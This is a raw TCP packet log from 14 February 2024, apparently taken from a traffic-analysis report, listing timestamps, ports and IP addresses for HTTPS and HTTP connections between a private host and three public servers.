Feb 14, 2024 09:07:52.804519892 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:52.805455923 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:52.847929001 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:52.883095980 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:52.925981998 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.198671103 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.198781967 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.198838949 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:53.198863029 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.198937893 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.198982954 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:53.198997974 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.199065924 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.199117899 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:53.199121952 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.199201107 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.199280977 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.199315071 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:53.199320078 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.199367046 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:53.199372053 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.199590921 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.199953079 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:53.296294928 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:53.296317101 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:53.296329021 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:53.296334028 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:55.561878920 CET	49706	80	192.168.2.5	45.74.19.84
Feb 14, 2024 09:07:56.551225901 CET	49706	80	192.168.2.5	45.74.19.84
Feb 14, 2024 09:07:58.566804886 CET	49706	80	192.168.2.5	45.74.19.84
Feb 14, 2024 09:08:02.566694975 CET	49706	80	192.168.2.5	45.74.19.84
Feb 14, 2024 09:08:10.566653013 CET	49706	80	192.168.2.5	45.74.19.84
Feb 14, 2024 09:08:16.976133108 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:16.976171970 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:16.976284981 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:16.986586094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:16.986605883 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.239758015 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.239842892 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.252218962 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.252233982 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.252826929 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.273973942 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.317909956 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.516830921 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.516966105 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517040968 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517050982 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.517076015 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517116070 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.517121077 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517287016 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517332077 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.517337084 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517410040 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517450094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.517453909 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517523050 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517575026 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.517579079 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517669916 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517719984 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.517724991 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517811060 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.517855883 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.517859936 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.518450975 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.518501043 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.518505096 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.518570900 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.518615961 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.518620014 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.519377947 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.519427061 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.519431114 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.519514084 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.519561052 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.519563913 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.520198107 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.520246029 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.520250082 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.520323992 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.520368099 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.520375967 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.520502090 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.520546913 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.520551920 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.520953894 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.520998955 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.521003008 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.521070004 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.521114111 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.521117926 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.521791935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.521847963 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.521852016 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.521929979 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.521975040 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.521979094 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.522538900 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.522586107 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.522589922 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.522716999 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.522763968 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.522767067 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.523402929 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.523458958 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.523463964 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.566652060 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.633439064 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.633521080 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.634515047 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.634572029 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.634597063 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.634645939 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.634917021 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.634974003 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.635668039 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.635726929 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.635744095 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.635797977 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.636599064 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.636655092 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.637253046 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.637304068 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.637327909 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.637379885 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.638107061 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.638159037 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.638837099 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.638890982 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.638914108 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.638967037 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.639667034 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.639723063 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.641001940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.641053915 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.641079903 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.641127110 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.687136889 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.687232971 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.750278950 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.750452995 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.751440048 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.751498938 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.751538992 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.751595974 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.751868010 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.751920938 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.752651930 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.752706051 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.752741098 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.752882004 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.753465891 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.753530979 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.754106998 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.754172087 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.754585028 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.754622936 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.754638910 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.754645109 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.754664898 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.754683971 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.755711079 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.755762100 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.756175041 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.756222010 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.756294966 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.756339073 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.757654905 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.757738113 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.757829905 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.757877111 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.757914066 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.757960081 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.758779049 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.758816004 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.758822918 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.758832932 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.758861065 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.758883953 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.759609938 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.759656906 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.760318041 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.760366917 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.760452032 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.760495901 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.761284113 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.761332989 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.762063980 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.762118101 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.763612032 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.763631105 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.763670921 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.763676882 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.763716936 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.765405893 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.765429020 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.765480995 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.765486002 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.765501976 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.765523911 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.767745972 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.767760038 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.767815113 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.767819881 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.767859936 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.769426107 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.769448996 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.769509077 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.769512892 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.769541025 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.769558907 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.771974087 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.771986961 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.772048950 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.772053957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.772083044 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.773720026 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.773732901 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.773797035 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.773802042 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.773832083 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.774785995 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.774832010 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.804313898 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.804358959 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.804387093 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.804392099 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.804416895 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.804435015 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.867458105 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.867476940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.867561102 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.867578030 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.867625952 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.869158030 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.869172096 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.869226933 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.869230986 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.869266033 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.871115923 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.871129990 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.871176004 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.871181965 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.871216059 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.873574972 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.873591900 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.873637915 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.873642921 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.873677015 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.875969887 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.875983953 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.876030922 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.876035929 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.876071930 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.877723932 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.877737045 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.877856970 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.877861977 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.877897978 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.880014896 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.880028963 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.880083084 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.880088091 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.880124092 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.881927013 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.881939888 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.881983995 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.881989002 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.882021904 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.884291887 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.884305954 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.884346008 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.884355068 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.884387970 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.886033058 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.886045933 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.886090994 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.886095047 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.886126041 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.888438940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.888453007 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.888498068 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.888501883 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.888534069 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.890181065 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.890196085 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.890242100 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.890247107 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.890281916 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.892726898 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.892741919 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.892786026 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.892791033 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.892823935 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.894555092 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.894570112 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.894618034 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.894623041 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.894654989 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.896816015 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.896831036 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.896886110 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.896891117 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.896940947 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.898734093 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.898767948 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.898801088 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.898804903 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.898830891 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.898849010 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.901041031 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.901066065 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.901092052 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.901096106 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.901118994 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.901135921 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.902896881 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.902918100 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.903183937 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.903188944 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.903314114 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.905282974 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.905303955 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.905342102 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.905344963 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.905371904 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.905388117 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.907685995 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.907751083 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.907753944 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.907772064 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.907804966 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.909430027 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.909471035 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.909486055 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.909490108 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.909516096 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.909531116 CET	49712	443	192.168.2.5	172.67.215.45
